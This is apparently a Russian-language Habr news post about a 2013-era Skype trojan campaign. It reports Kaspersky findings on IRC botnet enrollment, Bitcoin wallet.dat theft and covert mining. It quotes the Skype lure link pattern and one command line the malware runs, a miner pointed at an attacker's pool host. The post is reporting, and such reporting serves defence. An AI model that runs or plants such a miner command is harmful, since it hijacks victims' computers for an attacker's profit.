Pull to refresh

Новый skype-троян превращает компьютер в раба, добывающего Bitcoin

Information Security *Instant Messaging *
В блоге Дмитрия Бестужева, эксперта «Лаборатории Касперского», несколько дней назад появилось сообщение о массированной компании по распространению в skype нового трояна. Пользователям рассылаются сообщения, предлагающие перейти по некой ссылке вида:
www.goo.gl/XXXXX?image=IMG0540250-JPG

По состоянию на 4 апреля интенсивность перехода по ней составляла почти 3 клика в секунду, а общее число кликов — около 170к!
Большая часть жертв — из России и Украины:



Так же затронуты пользователи из Китая, Италии, Болгарии и Тайваня.
Сам троян написан на Visual Basic и так же способен распространяться через USB-накопители. После инфицирования, компьютер жертвы становится частью ботнета, используя для связи с командным сервером IRC протокол.
Кроме того, троян, похоже, ворует файл wallet.dat от Bitcoin кошелька:



В своём следующем посте, Дмитрий рассказал про аналогичную компанию, но распространяющую троян немного другого рода. Оказавшись на машине пользователя, он запускает команду:

bitcoin-miner.exe -a 60 -l no -o suppp.cantvenlinea.biz:1942/ -u XXXXXX0000001@gmail.com -p XXXXXXXX

Таким образом, заставляя ваш компьютер добывать биткоины для злоумышленника!
При этом, нагрузка на CPU значительно возрастает:



Один из хабраюзеров писал о трояне со схожей функциональностью 2 года назад, но теперь, похоже, интернет захлёстывает новая волна зловредного ПО, так или иначе связанного c Bitcoin, вокруг которого последнее время и так немало шума.
Tags:
Hubs:
Total votes 86: ↑73 and ↓13 +60
Views 92K
Comments Comments 86